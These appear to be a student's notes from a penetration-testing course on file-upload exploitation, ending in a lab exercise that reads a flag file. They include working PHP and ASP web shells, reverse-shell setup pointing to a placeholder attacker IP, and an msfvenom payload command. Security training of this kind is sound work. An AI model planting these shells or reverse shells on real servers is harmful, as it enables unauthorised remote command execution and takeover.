3 - Upload Exploitation

# Webshells - We can find many excellent web shells online that provide useful features, like directory traversal or file transfer - One good option for `PHP` is [phpbash](https://github.com/Arrexel/phpbash), which provides a terminal-like, semi-interactive web shell - Additionally, [SecLists](https://github.com/danielmiessler/SecLists/tree/master/Web-Shells) provides a plethora of web shells for different frameworks and languages, which can be found in the `/usr/share/seclists/Web-Shells` directory ![[images/Pasted image 20251222201653.png]] # Writing Custom Webshells - We should also know how to write a simple web shell manually because we may not have access to online tools during some pentests ## php webshell - Basic php webshell using the `system()` function ```php <?php system($_REQUEST['cmd']); ?> ``` - With this webshell we append `&cmd=<command>` to the URL such as ```url http://SERVER_IP:PORT/uploads/shell.php?cmd=id ``` ## asp webshell - For `.NET` web applications, we can pass the `cmd` parameter with `request('cmd')` to the `eval()` function - Basic asp webshell ```asp <% eval request('cmd') %> ``` - This webshell will execute the command specified in `?cmd=` and print its output # Revshells ## Basic Revshells - An example reliable revshell for `PHP` is the [pentestmonkey](https://github.com/pentestmonkey/php-reverse-shell) PHP reverse shell - Modify lines 49 and 50 for Kali machine's IP and port ```php $ip = 'OUR_IP'; // CHANGE THIS $port = OUR_PORT; // CHANGE THIS ``` - [SecLists](https://github.com/danielmiessler/SecLists/tree/master/Web-Shells) also contains revshell scripts for various languages and web frameworks - [Online - Reverse Shell Generator - Hacker wasii](https://djiangliu.github.io/revshells/) is also useful for generating many flavors of revshells ## Custom Revshells - We can use `msfvenom` generate revshell scripts in many languages and may even attempt to bypass certain restrictions in place - Below is an example where we generate a php revshell ```bash msfvenom -p php/reverse_php LHOST=OUR_IP LPORT=OUR_PORT -f raw > reverse.php ``` # Exercise - Create a basic php webshell ```bash echo '<?php system($_REQUEST['cmd']); ?>' > shell.php ``` ![[images/Pasted image 20251222202752.png]] - Lost quotes surrounding `cmd` > edit with `nano`![[images/Pasted image 20251222203129.png]] - Upload webshell ![[images/Pasted image 20251222202851.png]]![[images/Pasted image 20251222202903.png]] - Visit `/uploads/shell.php&cmd=id` - 404 error ![[images/Pasted image 20251222203542.png]] - Try to substitute the `&` for a `?` - Only use `&` if we are appending a command to a parameter that is first delimited with a `?` - Visit `/uploads/shell.php?cmd=id` - test command works ![[images/Pasted image 20251222203723.png]] - `cat` `/flag.txt` using below URL ```url http://94.237.123.236:54776/uploads/shell.php?cmd=cat%20/flag.txt ```